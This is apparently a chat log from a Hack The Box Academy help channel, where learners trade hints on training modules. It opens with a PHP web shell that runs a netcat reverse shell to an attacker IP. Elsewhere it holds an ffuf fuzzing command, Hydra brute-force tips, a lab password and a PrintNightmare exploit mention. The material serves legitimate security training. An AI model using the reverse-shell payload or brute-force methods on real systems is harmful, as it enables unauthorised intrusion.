<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.169 9443 >/tmp/f"); ?>
upload the file again
then on your bash do **sudo nc -lvnp 9443**
that should work
ping me if you need help
@rustic sage curl gives no output
when i enter the command it does nothing
wait imma try something i'll hit u up later if it works
ok
it worked! i just had to clone my VM for some reason
nice
anyone done Command Injections?
@lethal atlas sure have! What's up?
Hint to everyone. Read carefully. Lol
@lethal atlas hey bud, can I DM you ?
yes
Someone can help me with this? I've tried a different forms using "grep" command but I don't know exactly which pattern I must filter.
what module?
Linux Fundamentals
section?
ah yes. this question requires the use of several things. Curl, tr, cut, grep, sort, wc. all in one nice command
@unreal hull Feel free to DM me. That question is extremely difficult given that it's a "Tier 0" fundamental module.
module web request section http request and response how do i send a get request
on which section
http request and response
just go to that spawned ip
that's it
and on firefox u need to inspect the element
to find HTTP Headers
Got it ty
module web request
module web request section http headers my target machine doesn't seem to work
@molten epoch Sorry if this is a silly question, but have you tried respawning the target to see if the error persists?
its not silly and yes i tried 4 different machines
Ah. Maybe another dumb question, but you're navigating to http and not https right?
idk i just copy and paste the ip into firefox
I'm gonna try it on my end. One sec.
it loaded finally but i dont see a file named flag
One of my buddies ran into the same issue. The hint says to try refreshing the page if it doesn't show up... When I did this section earlier today on my VM, the "flag" request loaded automatically
Just loaded right away for me
ok i will keep reloading until i see it
ive reloaded like 7 times and it always the same things
are you using the provided os or are u using openvpn
this is all i get reloaded 16 times and counting
hey try on ur machine
I was using the pwnbox just now.
i dont know how to do it on my own machine
really well i will try tomorrow ran out of time for the machine
just open a browser and paste that ip
Hello all I'm working on Skills Assessment Login Brute Force, the Service Login SSH section. I'm wondering if I'm on the right track, I'm assuming it's referring to either bill or harry?
or am I completely missing something
I created a custom username and password list, but hydra is saying it's going to take 2:52 in order to finish
@summer pecan DM me 🙂

Is the magician, 1337 Y, use Password policy from the previous activity. Use his name and username. Dont forget u and f
it should only take 2 minutes to get the answer.
quiet night in here?
hello
i am on module Attacking Web Applications with Ffuf
on section filtering results
this is the question
and when i try ffuf
there is huge output
what do i have to do
its 300+ results
@rustic sage You need to filter the results.
yes but how?
there are many options when i try ffuf -h
@rustic sage Find what most results have in common, and filter them out.
wipe them out?
Ehhh, yes.
size 986
🧹
ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://139.59.175.51:30727/ -H 'Host: FUZZ.academy.htb' -fs 986
is this?
So, add a filter to your ffuf, that should "wipe out" any result with file size 986
No spoilers here, please
yes but which one is the correct filter?
Where did you get this command from, then?
htb academy ?
Right, so run a ffuf scan w/o a filter and pay attention what most results have in common, and filter them out
yes, how can i filter them out, i cant find the command
Did you try what you typed above?
this?
Yes.
still going
we will see
Have you updated your /etc/hosts file, btw?
oh
no let me do it now
so i do:
<target_ip> academy.htb
?
@rustic sage
@rustic sage Yes.
Hi guys I need some pointers on the ldapadmin password step
On Windows priv escalation assessment
Anyone that I can DM?
anyone have solution for RouterSpace machine?
Change your -u flag accordingly to your entry in /etc/hosts @rustic sage
what do you mean ?
Look at the example in that section there. Look how the -u flag is
ok on section filtering results?
Yes @rustic sage
<ip> that_link
In that window that shows you how to run a ffuf scan
i cant find it
i have to take a break
cyaa later
anyone have solution for RouterSpace machine? please
Thanks
@west canopy thank you for the help, I wasn't filtering my password list for the ssh challenge, worked in about 10 min once I did
stinking sed commands....
There is a specific channel for new boxes
I think you will need to register to see it

Stuck on Windows Privilege Escalation - Kernel Exploits. I received confirmation that one of the three exploits is broken which is the CVE-2020-0668. Was wondering what exploit was used to get the answer. Currently trying CVE-2021-1675.ps1 but I am unable to use the Invoke-Nightmare command
having issues with subdomain fuzzing. can some one give me a push in the correct direction?
disregard.
@slow ruin So my notes on that section aren't super detailed, but it looks like I had to copy the flag to my machine from SMB
Reached out to support and they updated the module (Windows Privilege Escalation). If you follow the steps using any of the exploits listed you will easily get the flag. I just want to say this platform is awesome!
Did you ask them when we are going to get a new module dropped?
flag is in the .js it not very worded clearly
cant someone help here completely lost.. or a hint
never mind found out how... :p
can anyone help me understand the "Active Subdomain Enumeration" of the "Information Gathering - Web Edition"? i honestly am so confused by everything and ive reread this section like 5 times and read some articles about zones but it doesnt make any sense to me, why are there only x zones, how to get the zones that have disabled file transfer for the other 2 FQDN questions, i get no TXT results.
I checked this thread to see if someone was asking this question and there was a guy who ran the same command as me, but i didnt get any TXT when i used dig but he did
If anyone has any notes or articles please send them my way, i will take a look in the morning. Ive been tunneling on this for the past 2 hours at this point
this is my axfr output
DM me
Hi guys, I am stuck on this question (Module: Hacking Wordpress)
Any hints?
Module: Command Injections
All three characters return "Invalid Input" - unless I do not URL encode & - but does not get accepted as the right answer.
Solved...
Perform a WPScan. It will detect a plugin that allows an unauthenticated file download.
some questions are weirdly asked like in some exams xD
Im working on footprinting, FTP.... i am trying to connect to the FTP with anon login but i only get root
if i try to LS i get pw request
nvm zorro showed me how stupid i actually am
its good to be shown our limits. really humbles you
have you ever edited the samba client?
You're not stupid Zorro is just really smart
he is assuming things i never tried to make him stupid
Lol well you couldnt make him stupid...unless 
Hello guys, can someone explain me why I cannot use Hydra to bruteforce login-page of Wordpress?
The password of erika is 010203
👋
Welcome
if anyone can help me with the "Active Subdomain Enumeration" from "Information gathering" i'd appreciate
What questions do you have?
i tagged it so i dont copypaste it
you right, my bad
Oh I cant help with theoretical questions like that, sorry
haha fair enough. can you tell me if im using the right command for dig, what am i missing. i searched this server and a guy was using the same command and was getting txt records as well
do i need to add the server etc/hosts or etc/resolv.conf
K let me take a look 1 sec
sure, thanks
Alright my bad, I was looking for the dms i had, the last time I helped someone with this question, I couldnt find them tho, What question are you stuck on?
all of them after the first one. i got the second one right but it was a lucky coincidence
try transferring the zone... and nsztm1 with what you are curious about
that should give you more domain names
thing is i dont understand exactly what the zones are. i know how many are
is one of them the namespace?
the first one is what you were originally given the in the first question, second one is the answer from the first question
hey guys. I got stuck in sqlmap essential in htb academy. i cant find flag for case 6 and 7. does anyone solve them?
but what do i add there? if i add the ip from the box and the inlanefreight.htb nothing happens
nop, changes nothing
if i add the ns there then it is like i do the nslookup with the ip
let me see the /etc/hosts
well ill be
@feral gyro are you around? have you done info gathering web edition?
Alright I will try, i was doing a box so i was putting this off
@fathom bay bro it works
Are you connected to the vpn?
nope from tomorrow i will start that
Its no fun
@cedar meteor ❤️ dont worry life will get better
but until then @languid dawn or @novel matrix can we ban this guy?
Hydra should already work.
But for WordPress there is a simple tool that can use the internal XMLRPC, WPScan.
no one know this?
quite straightforward use the prefix mentioned in the section for case 6 and for case 7 specify the column number
I agree but the speed of WPScan to bruteforce is quite slow... that why I would like to use hydra to make it quick
maybe this page will help you
https://linuxconfig.org/test-wordpress-logins-with-hydra-on-kali-linux
how do I connect via ssh
ssh user@ip
you can add -i if you have a key
how
any specific module u are trying to connect?
LINUX FUNDAMENTALS System Information
ssh htb-student@ip
then enter the password
thanks
Who did skill assessment in Command Injection?
Can somebody give me a hint in "SQL Injection - Union Injection"? I can't figure out what they mean by "user()" :/
Question: "Use a Union injection to get the result of 'user()' "
working on it now
user() is a query just like @@version
@haughty kiln just like he said, look at the example just above the question and change it
That was the first thing I did, but I only get an empty output xD
Or i get an error "unknown system variable"
Please send what you entered in DM
Answered you @haughty kiln
can I DM you?
yes brother
Thanks :) I am getting help from someone already...

Has anyone done the web requests module
yep
I am struggling with one of the boxes in that module - HTTP Headers and I have been reading and rereading and I am not sure what I am missing
shoot me a DM and I will see if I cant get you on the right path
Hey there, can anyone give me a nudge on the Linux Priv Esc - Miscellaneous Techniques module? I'm generally confused on how to start. they just give an ip address... nothing to ssh to so am I supposed to hunt for creds?
WTF is this
here is the full code:
Rabos@htb[/htb]$ curl -X DELETE http://Rabos@htb[/htb]$ curl -s http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City | jq
what do i have to do?
the code is broken
module ?
its on **Web Requests**
its only on my browser that? lmao
Im trying to grab a smbclient banner in the footprinting module
I seem to be using the wrong commands
Module
Module web request section GET i dont understand what im supposed to do to answer the question at the end
On which question?
i just got the question answer. thank you
i'm looking at a pcap. should I be able to access the url that's in the pcaps?
question about the "web applications" module, in the following scheme, they say each server runs a "component", what exactly would a component be ?
hey guys... anyone can help me in a problem that i have with the IP htb module give me.... the IP didnt work..
i put the IP address but it didnt charge the web
:p
It is described on the page
Do you use your own VM or do you use the pwn box?


